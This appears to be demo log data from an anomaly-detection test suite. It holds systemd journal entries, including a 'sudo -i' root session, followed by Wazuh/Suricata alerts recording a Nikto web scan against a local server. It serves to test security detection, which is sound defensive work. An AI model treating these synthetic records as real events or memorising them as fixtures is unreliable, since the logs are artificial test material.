"_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941228074", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36b;b=e2b08827b5804427b422c10c84f1567e;m=9f39479;t=5bd16e6b713e1;x=867aa9f125e4a6b0", "__REALTIME_TIMESTAMP" : "1615280941241313", "__MONOTONIC_TIMESTAMP" : "166958201", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent (ssh-agent emulation).", "USER_UNIT" : "gpg-agent-ssh.socket", "USER_INVOCATION_ID" : "e08cb56c58754a8398efac483a1dba4d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229248" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36c;b=e2b08827b5804427b422c10c84f1567e;m=9f39539;t=5bd16e6b714a0;x=400e7f2353aa30d4", "__REALTIME_TIMESTAMP" : "1615280941241504", "__MONOTONIC_TIMESTAMP" : "166958393", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (access for web browsers).", "USER_UNIT" : "gpg-agent-browser.socket", "USER_INVOCATION_ID" : "b39e086c7b804706842cb5400720e511", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229328" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36d;b=e2b08827b5804427b422c10c84f1567e;m=9f395ca;t=5bd16e6b71531;x=52761cb2e41930ca", "__REALTIME_TIMESTAMP" : "1615280941241649", "__MONOTONIC_TIMESTAMP" : "166958538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (restricted).", "USER_UNIT" : "gpg-agent-extra.socket", "USER_INVOCATION_ID" : "ee556158c4bf463385dec9fc66af4c30", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229417" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36e;b=e2b08827b5804427b422c10c84f1567e;m=9f39631;t=5bd16e6b71599;x=5184e17a5bcb18ae", "__REALTIME_TIMESTAMP" : "1615280941241753", "__MONOTONIC_TIMESTAMP" : "166958641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "USER_UNIT" : "paths.target", "USER_INVOCATION_ID" : "e5185ac070ea4df98a4b00c613372bef", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229430" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36f;b=e2b08827b5804427b422c10c84f1567e;m=9f39694;t=5bd16e6b715fb;x=8814a2efb8bec83b", "__REALTIME_TIMESTAMP" : "1615280941241851", "__MONOTONIC_TIMESTAMP" : "166958740", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG network certificate management daemon.", "USER_UNIT" : "dirmngr.socket", "USER_INVOCATION_ID" : "55274947c49b4c41b3476d8adca963a3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229505" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=370;b=e2b08827b5804427b422c10c84f1567e;m=9f39702;t=5bd16e6b71669;x=46fe52ce71c1fcf7", "__REALTIME_TIMESTAMP" : "1615280941241961", "__MONOTONIC_TIMESTAMP" : "166958850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache.", "USER_UNIT" : "gpg-agent.socket", "USER_INVOCATION_ID" : "1f52d7a7d03443b58a9f67be9e3267f8", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229589" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=371;b=e2b08827b5804427b422c10c84f1567e;m=9f3976b;t=5bd16e6b716d2;x=ca1e497010c4b6c5", "__REALTIME_TIMESTAMP" : "1615280941242066", "__MONOTONIC_TIMESTAMP" : "166958955", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "USER_UNIT" : "sockets.target", "USER_INVOCATION_ID" : "57308a089fb44c85aa8b28764208cbb1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229604" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=372;b=e2b08827b5804427b422c10c84f1567e;m=9f397cd;t=5bd16e6b71734;x=c94451d35f946e0", "__REALTIME_TIMESTAMP" : "1615280941242164", "__MONOTONIC_TIMESTAMP" : "166959053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "USER_UNIT" : "basic.target", "USER_INVOCATION_ID" : "9279cf273e684a6cb8f893a4238d4ce9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229614" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=373;b=e2b08827b5804427b422c10c84f1567e;m=9f3982d;t=5bd16e6b71795;x=cfe3a72a477d7ed5", "__REALTIME_TIMESTAMP" : "1615280941242261", "__MONOTONIC_TIMESTAMP" : "166959149", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "MESSAGE" : "Started User Manager for UID 1000.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229762" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=374;b=e2b08827b5804427b422c10c84f1567e;m=9f398b2;t=5bd16e6b71819;x=759f2aa62d425194", "__REALTIME_TIMESTAMP" : "1615280941242393", "__MONOTONIC_TIMESTAMP" : "166959282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Default.", "USER_UNIT" : "default.target", "USER_INVOCATION_ID" : "deceef39a2384492929e08a3ad22033b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941231978" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=375;b=e2b08827b5804427b422c10c84f1567e;m=9f39918;t=5bd16e6b71880;x=c18702b1dbf43c11", "__REALTIME_TIMESTAMP" : "1615280941242496", "__MONOTONIC_TIMESTAMP" : "166959384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3272", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "eed00a68ffd84e31882105fd973abdd1", "USERSPACE_USEC" : "179998", "MESSAGE" : "Startup finished in 179ms.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941232011" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=376;b=e2b08827b5804427b422c10c84f1567e;m=bc70466;t=5bd16e88a83cd;x=4643ca9ef29700d7", "__REALTIME_TIMESTAMP" : "1615280971875277", "__MONOTONIC_TIMESTAMP" : "197592166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_UID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "MESSAGE" : " ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/bash", "_PID" : "1234", "_GID" : "1000", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", "_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971874922" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=377;b=e2b08827b5804427b422c10c84f1567e;m=bc71293;t=5bd16e88a91fb;x=c5d63933ce56dcfb", "__REALTIME_TIMESTAMP" : "1615280971878907", "__MONOTONIC_TIMESTAMP" : "197595795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "_PID" : "1234", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", "_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "MESSAGE" : "pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971878330" } logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/wazuh.log000066400000000000000000005173061500476301700315310ustar00rootroot00000000000000{"timestamp":"2020-03-04T19:18:35.196472+0000","rule":{"level":6,"description":"IDS event.","id":"20101","firedtimes":1,"mail":false,"groups":["ids"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.5603","full_log":"03/04/2020-19:18:35.196472 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:47564 -> 192.168.10.154:80","predecoder":{"timestamp":"03/04/2020-19:18:35.196472"},"decoder":{"parent":"snort","name":"snort"},"data":{"srcip":"192.168.10.238","dstip":"192.168.10.154:80","id":"1:2221030:1"},"location":"/var/log/forensic/suricata/fast.log"} {"timestamp":"2020-03-04T19:18:34.343787+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":1,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.6012","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.343787+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46938,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.343787+0000","flow_id":"2066313044966357.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46938","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ncf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.345338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":2,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.7549","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.345338+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46940,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.345338+0000","flow_id":"1697602987508313.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46940","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.347250+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":3,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.9086","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.347250+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46942,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.csc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.347250+0000","flow_id":"1217064866564597.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46942","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.csc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.349169+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA 